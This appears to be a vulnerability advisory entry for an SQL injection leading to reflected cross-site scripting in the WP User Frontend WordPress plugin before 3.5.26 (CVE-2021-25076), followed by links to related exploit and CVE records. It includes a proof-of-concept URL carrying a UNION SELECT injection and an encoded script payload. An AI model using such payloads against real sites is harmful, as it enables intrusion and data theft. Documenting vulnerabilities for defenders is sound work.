Lucene search
Krzysztof ZającWPEX-ID:6D3EEBA6-5560-4380-A6E9-F008A9112AC6HistoryDec 27, 2021 - 12:00 a.m.
WP User Frontend < 3.5.26 - SQL Injection to Reflected Cross-Site Scripting
2021-12-2700:00:00
Krzysztof Zając
65
0.005 Low
EPSS
Percentile
77.2%
The plugin does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=%22+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0x3c696d6720737263206f6e6572726f723d616c6572742831293e+--+gRelated
prion
prion
Cross site scripting
2022-01-24 08:15:00
nvd
nvd
CVE-2021-25076
2022-01-24 08:15:09
zdt
zdt
cve
cve
CVE-2021-25076
2022-01-24 08:15:09
patchstack
patchstack
githubexploit
githubexploit
Exploit for SQL Injection in Wedevs Wp User Frontend
2022-06-04 21:22:10
cnvd
cnvd
WordPress WP User Frontend plugin SQL injection vulnerability
2022-01-26 00:00:00
wpvulndb
wpvulndb
WP User Frontend < 3.5.26 - SQL Injection to Reflected Cross-Site Scripting
2021-12-27 00:00:00
cvelist
cvelist
packetstorm
packetstorm
WordPress WP User Frontend 3.5.25 SQL Injection
2022-02-21 00:00:00
exploitdb
exploitdb
WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)
2022-02-21 00:00:00